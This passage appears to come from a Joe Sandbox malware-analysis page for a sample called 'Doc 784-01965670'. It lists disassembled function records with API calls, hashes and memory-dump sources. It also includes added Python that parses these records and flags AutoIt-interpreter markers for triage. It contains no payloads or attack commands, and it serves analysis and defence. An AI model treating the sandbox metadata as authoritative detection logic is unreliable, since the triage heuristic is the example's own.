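    """Map the first 16 hex digits of each Instruction Fuzzy Hash to its verdict."""
    return {e.fields.get("Instruction Fuzzy Hash", "?")[:16]: triage(e) for e in parse_entries(text)}


if __name__ == "__main__":
    for h, (verdict, msgs) in report(SAMPLE).items():
        print(f"{h}  {verdict:24s} {'; '.join(msgs)}")
```

The fuzzy hash prefix is used as the key because it is the one identifier Joe Sandbox keeps stable across dumps of the same function; the API ID fallback only matters for entries like the htons/inet_addr one, where the report lists no call sites and the callees survive only in the Similarity block.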

Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
• Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
• Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
• Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
• Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend_wcslen
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 455545452-1403004172
                                                                                                                                    • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                                    • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                                                                                    • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                                    • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                                                                                    APIs
                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InternetOpen
                                                                                                                                    • String ID: <local>
                                                                                                                                    • API String ID: 2038078732-4266983199
                                                                                                                                    • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                                                    • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                                                                                                    • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                                                    • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend_wcslen
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 455545452-1403004172
                                                                                                                                    • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                                    • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                                                                                    • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                                    • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend_wcslen
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 455545452-1403004172
                                                                                                                                    • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                                    • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                                                                                    • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                                    • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _strncmp
                                                                                                                                    • String ID: ,$UTF8)
                                                                                                                                    • API String ID: 909875538-2632631837
                                                                                                                                    • Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                                                                    • Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
                                                                                                                                    • Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                                                                    • Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _strncmp
                                                                                                                                    • String ID: ,$UTF8)
                                                                                                                                    • API String ID: 909875538-2632631837
                                                                                                                                    • Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                                                                    • Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
                                                                                                                                    • Opcode Fuzzy Hash: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                                                                    • Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                    • wsprintfW.USER32 ref: 004560E9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend_mallocwsprintf
                                                                                                                                    • String ID: %d/%02d/%02d
                                                                                                                                    • API String ID: 1262938277-328681919
                                                                                                                                    • Opcode ID: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
                                                                                                                                    • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                                                                                    • Opcode Fuzzy Hash: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
                                                                                                                                    • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                                                                                    APIs
                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                                                                      • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
• Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
• Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
• Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
• PostMessageW.USER32(00000000), ref: 00442247
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
• Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
• Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
• Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
  • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
• Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
• Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
• Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E
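The "APIs" entries in these function records follow one fixed textual layout: a bullet, the API name and its module ("FindWindowW.USER32"), the argument values recorded at the call site in parentheses, and the caller address after "ref:"; calls reached through a callee carry a "Part of subcall function <addr>:" prefix. The Python below is an added example written for this page, not code from Joe Sandbox or its IDA plugin: it parses those lines into structured records and then applies a small triage heuristic of my own, flagging the two call patterns visible above that are characteristic of the AutoIt3 interpreter stub (a FindWindowW on the Shell_TrayWnd taskbar class, and the interpreter's own "Error allocating memory." MessageBox with caption "AutoIt"). The sample input is the API lines copied from this section; the dataclass, function names and marker names are assumptions of the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the "APIs" bullet lines from this report section, verbatim.
SAMPLE_API_LINES = """\
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
• PostMessageW.USER32(00000000), ref: 00442247
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
  • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
"""

# One report line: [Part of subcall function XXXXXXXX:] Name.MODULE[(args)] ref: XXXXXXXX
_LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*?)\))?"
    r"[,\s]*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str                         # e.g. "FindWindowW"
    module: str                      # e.g. "USER32"
    args: List[str]                  # raw argument strings; "?" means the sandbox could not resolve it
    ref: int                         # address of the call instruction
    subcall_of: Optional[int] = None # address of the intermediate function, when given


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse Joe Sandbox 'APIs' bullet lines into ApiCall records.

    Raises ValueError on a line that does not match the layout, so a report
    format change is noticed rather than silently dropping calls.
    """
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = _LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def autoit_runtime_markers(calls: List[ApiCall]) -> dict:
    """Heuristic (this example's own, not a Joe Sandbox signature): flag call
    patterns that together point at the AutoIt3 interpreter stub.

    - FindWindowW("Shell_TrayWnd", ...): the interpreter locating the taskbar.
    - MessageBoxW(..., "Error allocating memory.", "AutoIt", ...): the
      interpreter's out-of-memory dialog, with its fixed caption.
    Either alone is weak evidence; both in one binary are a strong hint that
    the payload is a compiled AutoIt script rather than native code.
    """
    found = {"taskbar_findwindow": False, "autoit_oom_messagebox": False}
    for c in calls:
        if c.api == "FindWindowW" and c.args[:1] == ["Shell_TrayWnd"]:
            found["taskbar_findwindow"] = True
        if c.api == "MessageBoxW" and len(c.args) >= 3 and c.args[2] == "AutoIt":
            found["autoit_oom_messagebox"] = True
    return found


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES)
    for c in parsed:
        via = f" (via sub {c.subcall_of:08X})" if c.subcall_of is not None else ""
        print(f"{c.ref:08X}  {c.module}!{c.api}({', '.join(c.args)}){via}")
    print(autoit_runtime_markers(parsed))
```

The parser fails loudly on an unrecognised line rather than skipping it, which is the behaviour you want when feeding many reports into a pipeline: a silently empty call list looks identical to a benign sample.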